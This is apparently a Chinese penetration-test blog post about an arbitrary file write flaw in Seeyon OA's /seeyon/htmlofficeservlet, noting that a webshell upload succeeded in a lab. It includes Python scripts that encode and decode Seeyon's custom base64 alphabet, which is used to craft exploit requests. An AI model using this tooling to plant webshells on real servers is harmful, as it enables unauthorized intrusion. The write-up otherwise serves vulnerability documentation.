20201312致远OA任意文件写入漏洞

20201312致远OA任意文件写入漏洞

十二月 14, 2020

20201312致远OA任意文件写入漏洞

一次渗透测试中遇到的环境,通过互联网找寻到的漏洞信息,在此进行记录

!!!本次环境均为内网测试环境,也并不包含任何敏感信息 !!!

对环境进行简单的验证/seeyon/htmlofficeservlet
image.png

漏洞利用:
image.png

在这里我的文件是上传成功了但是却返回mull,猜测可能是马儿有问题,但是时间问题没有做太多测试,仅仅在后期对加密方式进行了摸索最后在https://paper.seebug.org/964/ 找到了解密的方法

Python脚本
解密脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import base64
import os
#sakuradied
def en(Str):
    code = """gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"""
    code1 = """ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="""
    ii = 0
    w = ''
    for a in Str:
        ii = 0
        for b in code:
            if a == b:
                w = code1[ii] + w
            ii = ii + 1
    b64 = (w[::-1])
    #print(b64)
    try:
        ba64 = base64.b64decode(b64)
        print(ba64.decode())
    except Exception as err:
        print("失败,请检查您输入的是否正确,错误信息为:",err)


if __name__ == "__main__":
    Str = input("输入>>")
    Str = base64.b64encode(Str.encode('utf-8'))
    Str = Str.decode()
    en(Str)

加密脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/python3 
import base64
import os
#sakuradied

def en(Str):
    code1 = """gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"""
    code = """ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="""
    w=''
    for a in Str:
        ii = 0
        for b in code:
            if a == b:
                w= w + code1[ii]
            ii = ii +1
    print(w)


if __name__ == "__main__":
    Str = input("输入>>")
    Str = base64.b64encode(Str.encode('utf-8'))
    Str = Str.decode()
    en(Str)

这个是随便写的,挺乱的

参考资料:
https://paper.seebug.org/964/
https://www.adminxe.com/1147.html